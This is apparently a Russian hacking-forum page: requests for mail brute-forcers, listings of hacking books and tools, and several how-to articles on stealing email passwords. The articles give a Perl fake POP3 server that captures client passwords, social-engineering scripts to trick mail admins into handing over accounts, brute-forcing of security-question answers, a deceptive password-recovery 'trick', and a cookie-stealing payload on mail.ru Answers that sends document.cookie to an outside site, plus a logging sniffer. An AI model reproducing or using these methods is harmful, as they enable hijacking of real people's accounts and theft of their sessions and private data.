Откройте свой Мир!

ia zblsa uji ska4ovat virusnyie mailbruty ska4ovat kto znaiet gde mojno reaaalno ska4at mail bruts)) pomagite pleaseeeee!!! bez virusov

pamagite mne vernut uznat parol xarman96@mail.ru

Оригинальное название: Секреты хакера. Защита и атака
Описание: В этом учебном курсе представлена обширная информация о методах локальной и сетевой атаки
на компьютеры пользователей.[ Читать далее... → ]

Название: Все для ХАКЕРА - супер секреты по взлому (2009)

[ Читать далее... → ]

Название: Как взломать ADSL модем, Интернет нахаляву...
[ Читать далее... → ]

Выкладываю тебе книги по хакингу на английском языке.
[ Читать далее... → ]

Качество: Отсканированные страницы
Описание: Hacking.app
[ Читать далее... → ]

Версия в раздаче: Средни
Операционная система: Windows 98, 2000, XP
Описание:
[ Читать далее... → ]

привет орлы!Вот вам еще пара инструментиков вам пошакалить в инете и поприкалываться над ламерочками
[ Читать далее... → ]

Версия в раздаче: Средни
Год выхода: 2003-2006
Операционная система: Windows 98/ME/2000/XP/2003
[ Читать далее... → ]

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2007
[ Читать далее... → ]

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2006
Описание:
[ Читать далее... → ]

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2006
Описание:
Компиляторы:
[ Читать далее... → ]

Восстановление паролей Pak: 1(ICQ, E-mail, Брутфорсы, Взлом PWL\SAM)
[ Читать далее... → ]

Производитель: Gameland
Год выпуска: 2006
[ Читать далее... → ]

огромная подборка журналов хакер который позволит округлить твой кругозор и углубить свой глубодум =)
[ Читать далее... → ]

Довольно тривиальная задачка – имеется установленный почтовик, в
котором вбит предустановленный пароль. Чтобы его расшифровать, есть,
минимум, 3 способа. Во-первых, заветный пароль можно вытащить из
конфигов (как вручную, так и различными приложениями). Однако в
большинстве случаев, пассворд шифруется, и изъять его не получается.
Например, те же Openpass, Passview или Recover не запускаются при
установленном антивирусе или файрволе. В итоге приходится
довольствоваться старым дедовским способом по искусственному
«выманиванию» паролей из почтовых программ.

1. Откроем твой любимый блокнот и напишем
простенький Fake-POP3-сервер, посредством которого вытащим любой пароль.

#!/usr/bin/perl

# Emulate the fake pop3 service ;)

use IO::Socket;

$|++; # Юзаем сокет и отрубаем буферизацию

$sock=IO::Socket::INET->new(Listen=>10,LocalPort=>110,Proto=>'tcp',Reuse=>1)
|| "Cant open port: $!\n"; # Создаем сокет на 110 порту локальной
машины

while($client=$sock->accept()) {

while(1) { # Слушаем новых клиентов и входим в бесконечный цикл при
каждом новом соединении

$client->send("+OK Fake POP Service ready\n"); # Выдаем баннер

$stat=$client->recv($data,1024);

$client->send("+OK Password?\n");

$stat=$client->recv($data,1024); # Организуем обмен данными
согласно RFC1939

(undef,$data)=split(' ',$data);

print "Password is \"$data\"\n"; # Отделяем пароль и пишем его в
консоль

close($client); # Обрубаем клиент и выходим из программы

exit;

}

}

2. Изменяем в клиенте хост почтового сервера на
локальный адрес (либо на любой другой, куда будет заливаться фейковый
скрипт).

3. Запускаем фейковый скрипт и инициируем процесс
получения новых сообщений. Как итог – ты получишь пароль в plain-text,
нарисованный в консоли. Задачка выполнена.

Кстати, таким нехитрым образом можно получить пароли от
совершенно любых клиентов (например, на FTP). Главное – знать команды
обмена в нужном протоколе.

Один из самых простых
Пишите владельцу мыла какое нить
письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил.
Если это какой нить "чудо-крутой хакер", то что нить типа : "Слушай , а
ты в натуре можешь сайт сломать? http://www.xakep.ru не твоя работа?"
Если Веб-мастер , то что нить типа :"Мне так нравится как ты пишешь! А у
тебя JAVA-скрипта нету ,что б он там чe нить делал?"...По фигу ЧТО ,
главное что б от него назад ответ пришел. В принципе эта вся процедура
была только для того ,что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место
расположения "клиента".То бишь если по этому мылу находится аська , то
смотрим инфу в аське , город (если не прописан в аське , то по ИП) , имя
, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной
системы есть админ , и у 99% www-шные сервера) ,обычно это адреса
admin@provider.ru и support@provider.ru. Так вот... Пишешь письмо (очень
желательно через www-браузер , например от www.mail.ru или
www.hotmail.com ) и через анонимную проксю .Это для того что б в
заголовке пакета был ИП прокси. Так... для секьюрити... =) Так вот. В
теле письма пишешь , что так и так... Злобные хакеры украли у тебя мыло ,
а тебе очень нравится их служба , сервис , скорость работы
,безглючность и все такое... Что ты никогда не променяешь ихний сервис, и

что они вообще самые крутые мыльщики! Указываешь ИМЯ , ФАМИЛИЮ ,ЗИП ,
ГОРОД , Телефон (от балды) или что они там еще просят.... Ессено назад
придет письмо , что "Информация не совпадает с введеной при регистрации и
все такое...". Но ты будь настойчивей! Пиши назад , что то что ты им
выдаешь - единственная верная информация о твоем аккаунте! И повторяешь
им ту же инфу , что и первый раз. И так пока админ не сломится...но не
забывай каждый раз расхваливать их сервис!=) Обычно раз на 7-10
прокатывает... :) У меня был даже раз случай , когда один буржуйский
админ "отдал" мне мыло , где
(как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала
той что я ему ВЫДАВАЛ якобы за владельца аккаунта!



Второй способ. Посложнее , но все равно общедоступный. Почти в каждом
мыльном сервисе есть служба что типа "Foggot Password?" Так
вот...Заходим туды (предварительно не забыв изменить атрибуты филе
cookie для этой службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы...
Если повезет , то вопрос будет (к примеру на мыло.ру) " В каком городе
ты родился"? В первом способе описано как узнавать город юзверя по мылу
или по асе, так же через программу SmartWhois 3.2 узнать город не так и
сложно, так что на этом не бум останавливаться. Ну и вопросы бывают
"кустомайзские"- типа "2000" , ответ обычно такой же. Авот если что нить
типа "Как зовут мою собаку?" , то читай дальше...



Открываем эту страницу (ну где вводить надо ответ на секретный вопрос ,
не догоняешь что ль???=) итам в HTML-просмотре ищем строчкутипа : form
action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла
http://www.mail.ru , то полный урл места куда отправляется"секретный
ответ" будет http://www.mail.ru/cgi-bin/.... Этот урл
вводишь вместе с индефикатором Вопроса в программу типа WebCrack 2.0 .
Идентификатор вопроса находится там же где и form
action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту
программу или загружаешь встроенный wordlist c паролями или пишешь свой
по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и
ждешь...

Эта простенькая статейка о том, как утащить пароли от почты ваших
знакомых. Причем, что бы получить пароли описанным ниже способом не надо
быть гуру в области взлома - надо быть гуру в психологии человеческого
сознания.... Ну ладно, приступим. Все в курсе, что ламер - это
пользователь с очень завышенной самооценкой своих возможностей. Ламеру
кажется, что его возможности безгарничны, он может делать все что хочет,
если захочет. Порой эти люди так забивают свой разум мыслями о своем
величии, что попадаются на очень простые "засеры мозгов".

Ловушка которой пользуются, заключается в том, что ламеры считают себя
хакерами и непрочь сделать какую-нибудь гадость ближнему своему дабы
поднять свою самооценку (причем переписать соседовский пасс от инета на
бумажку и потом юзать его в тихую с пяти до шести утра - это просто
мега-хак в их понимании). Им опасно давать какую-либо информацию о
взломе, трояны, червяков....- все это они пускают в ход сиюминутно, не
задумываясь о последствиях. Но это свойство ламеров можно обратить к
себе во благо.Все знают про систему восстановления паролей на почтовых
серверах таких как mail.ru, rbcmail.ru, stsland.ru и т.д.

На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который
имеет слабую память и тупые мозги, чтоб запомнить свой пароль и
частенько эти перцы сталкиваются с проблемой забывания пароля. Пароли
должны быть легко запоминающемися. Например, имя вашей любимой собачки.
Итак, даже небольшой процент от более чем милионной толпы владельцев
мыльниц - это тоже своеобразная толпа, которая требует свои пароли.
Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают
ответ на секретный вопрос, данные, которые Вы вводили при регистрации и
т.п. Но самое интересное, что этим занимается не человек, а машина, т.е.
обычная программулина !!!! А если есть программа - есть в ней дыра.
Теперь приступим к описанию конкретных действий. Тут все просто. По
адресу pasrepair@stsland.ru сидит mail-робот, который анализирует
запросы на восстановление пароля и в зависимости от этого либо уточняет
ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения
с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не
один, а два запроса, то проверятся будет последний ящик, а информация
будет выслана для второго! Так
шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем
инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )

Итак, мы хотим обломать vasya_pupkin@mail.ru

Наш ящик hack@mail.ru пароль fooly

Пишем письмо роботу на pasrepair@mail.ru

Subject:
login=vasya_pupkin&pass=&answer=;login=hack&pass=fooly&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве -

vasya_pupkin@mail.ru :
login=vasya_pupkin&pass=&answer=

А потом, через точку с запятой второй запрос, с вашими данными, которые
робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=

Итого : тема сообщения выглядит вот так :

login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Все, ждите пасс на ваше мыло!!!


Я надеюсь этой статье вы не поверили, потому что все это сделано для
того, чтобы тянуть пароли, так что остерегайтесь таких казусов, ух ты
блин какое слово :))

Четырнадцатое февраля, год 2008. Мыло, ася и прочие средства
коммуникации уже до отказа завалены сердечками и прочей романтичной
лабудой. Народ дурачится, влюбляется, ссорится и мирится в Сети. А
также скамит, ломает, и сканит. И тут, по иронии судьбы, мне в ящик
свалилось несколько уведомлений о том, что мои комменты на проекте
«Ответы» mail'а были признаны лучшими. Я полез на проект освежить в
памяти собственное творчество. Мимолетом просмотрел ТОП вопросов и пару
страниц в рубрике компьютеров и интернета. Листая темы, я стал все чаще
замечать появление сообщений странного содержания. Народ ругался на
выскакивающие окошки в IE, на левые фреймы, вставленные прямо в вопросы
и ответы пользователей… Конечно же, речь зашла об XSS, наличие которой
я не мог не проверить.

Быстренько сварганив очередной вопрос типа «а есть ли тут XSS?», я
поднял его в топы (не бесплатно, к сожалению) и стал ждать реакции.
Добрые люди запостили ответ с фреймом размером раза в два больше
разрешения моего монитора и подсказали, как это дело протолкнуть мимо
фильтров. Дальше оставаться в стороне я уже не мог.

Ведь если на майле реально украсть куки (а значит и чужую сессию),
то хакеру станет доступно и мыло жертвы (точнее, появится возможность
авторизации на mail.ru без ввода пароля). Очень и очень заманчиво!

Кто ищет, тот найдет
Собственно, как такового, межсайтового скриптинга на проекте не
обнаружилось. Максимум, что можно было сделать – вставить более или
менее разрешенные теги оформления шрифта, таблицы, фреймы и картинки.
Любые скрипты, валидно написанные обработчики событий и прочий
«опасный» контент сразу же квотился либо реплейсом вообще удалялся со
страниц. Миф о похищении куков витал в воздухе и распространялся со
скоростью 300 символов в минуту!

Попытки отправить в тексте скрипт в голом виде либо внедрить его в
события, скрытые от пользователя, успехом не увенчались. Что ж,
придется попробовать сыграть на доверии простодушных юзверей. И так как
народ приходит на сайт за ответами, я решил помочь бедолагам найти
ответы сразу на все вопросы, а именно – немного разрекламировать WiKi,
добавив в свой вопрос кнопочку для перехода на сайт энциклопедии. В
итоге получился примерно такой код:



Как видишь, тут всего один тег, который отображает кнопочку на
странице, но стоит ее нажать и браузер будет перенаправлен на наш
сторонний портал. Причем в адресной строке мы дополнительно передадим
один единственный параметр cookies, в котором и будут храниться куки
жертвы. Что с ними делать, рассказывать не буду: уж что такое сессии и
с чем их едят, ты должен знать!

Обрати внимание на JS-функцию escape() – без нее строка куков будет
передаваться «как есть», а это недопустимо: пробелы, знаки амперсанда
или одинарные кавычки порвут в клочья код события нажатия кнопки. А
подготовив всю строку этой функцией, мы сохраним ее как одно целое
значение GET-параметра cookies.

Научным методом тыка было доказано: для успешного проникновения на
страницы сайта, этот код дополнительно надо «заURLэнкодить». В PHP этим
занимается функция urlencode(string). Ею я и воспользовался. Чтобы
пробелы оставались пробелами, их я вернул в исходный вид (urlencode
превращает их в знаки «+»).

Итоговый URL-кодированный текст я и запостил на сайте:

%3Cinput type%3Dbutton value%3DWiki
onclick%3D%22document.location.replace%28%27http%3A%2F%2Fsite.xx%2Fwiki.php%3Fcookies%3D%27%2Bescape%28document.cookie%29%29%3B%22
%3E

С виду обычный текст, дополнительная кнопочка для перехода на сайт
Википедии. В общем-то, ничего особенного. Главное, чтобы нас ни в чем
не заподозрил обыватель. А посему пишем простенький снифер на нашем
удаленном портале и не забываем перенаправить жертву на запрашиваемый
сайт.

Все по полочкам
В сети часто проскакивают вопросы, о том, как и где можно отследить
IP жертвы. Как вообще его узнать, где раздобыть снифер под это дело,
etc. Бросьте вы это занятие. Не надо полагаться в столь интимном
вопросе на чужих людей. Пишите сами, и основной проблемой останется
лишь загнать жертву на ваш сайт «посмотреть фото в сауне» или «узнать
номер телефона симпатичной блондиночки», под ником и аватаром которой
вы в очередной раз скрываетесь, бороздя чаты и форумы в поисках легкой
наживы.

Вот вам пример того, как сохранить параметр cookies адресной строки.
Аналогично логируются и IPы и все остальное. Достаточно внимательно
почитать, что нам доступно в коде на примере того же PHP - www.php.net/manual/ru/reserved.variables.php.



Проверяем наличие в суперглобальном массиве GET искомого параметра.
Далее пытаемся открыть (создать, если не было ранее) файл, куда будем
накапливать построчно данные о жертвах. Если все прошло успешно, пишем
новую строку – нужные нам сведения, завершаем их переводом строки и
закрываем файл. В любом случае отдаем браузеру заголовок Location,
который перенаправит его на другой адрес. Так мы немного замаскируемся
от глаз неопытного пользователя.

При работе с хэдерами помни, что они не могут передаваться в браузер
после выдачи контента. Все заголовки страницы должны идти до любого
вывода данных. А так как мы скрываем, по возможности максимально, наш
снифер, то и вывод ошибок допустить нельзя (таких как, например, нет
переменной в GET-массиве, не удалось создать или открыть файл etc.),
иначе перенаправить браузер жертвы не получится (текст ошибок появится
раньше, и новый location будет проигнорирован). Это выдаст нас с
потрохами.

Проверяем работу! Кликаем на кнопочке на сайте Ответов и почти тут
же попадаем на Википедию. Проверяем содержимое файла cookies.txt и, о
чудо, видим там не только свои куки, но и печенюшки других посетителей.
Тех самых, что успели за время тестов добродушно поделиться с нами
своими аккаунтами. Остается только подменить их кукисы в браузере,
обновить страницу и мы превратимся в другого пользователя, сможем
постить от его имени, ковыряться в личных настройках, приватных данных
и прочих вкусностях. Хотя поменять что-то особо важное нам все равно не
позволят без ввода пароля.

Но так как это не очень законно, бежим скорее в саппорт и жалуемся
на работу программеров, допустивших баг. Сами, конечно, тут же забываем
события последних 10 минут и никогда, запомни, никогда не повторяем их,
кроме как в целях ознакомления!